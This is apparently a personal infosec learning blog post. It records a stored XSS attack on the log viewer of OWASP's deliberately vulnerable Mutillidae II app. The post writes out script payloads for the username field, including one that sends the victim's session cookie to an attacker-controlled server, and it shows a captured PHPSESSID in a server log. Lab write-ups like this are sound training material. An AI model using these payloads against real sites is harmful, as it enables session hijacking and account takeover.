About this blog

I'm a developer with over 10 years experience who wants to transition to infosec. This blog is an informal record of my experiments with OWASP's Mutillidae II, a web application exhibiting a multitude of deliberate vulnerabilities. I will also take Offensive Security's PWK training course and get the OSCP certificate

Wednesday, 31 August 2016

Stored XSS vulnerability in log viewer

The log contains attempted login entries like this:

User foobar attempting to authenticate

The log is viewed as an HTML table, so we can try to inject some script in the username field.

<script>alert('hello');</script>

Now when we view the log:
Something more interesting:

<script>alert(document.cookie)</script>

An attacker would silently send the cookie to somewhere he could pick it up later:

<script>new Image().src = "http://localhost/?" + encodeURIComponent(document.cookie)</script>

On the attacker-controlled server:

$ tail -f access.log
::1 - - [31/Aug/2016:06:38:31 -0400] "GET /?showhints%3D1%3B%20PHPSESSID%3Dq5p2do7c17d64sfj5bvuem2si1 HTTP/1.1" 302 -

The attacker will hope to get the admin's cookie when the admin next views the logs webpage.

Of course stealing a session cookie is only one application of an XSS.  The "XSS Payloads" website has a library of scary payloads that can take screenshots, keylog, remote control the browser, attempt to turn on your webcam and more.
Posted by at
Labels: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)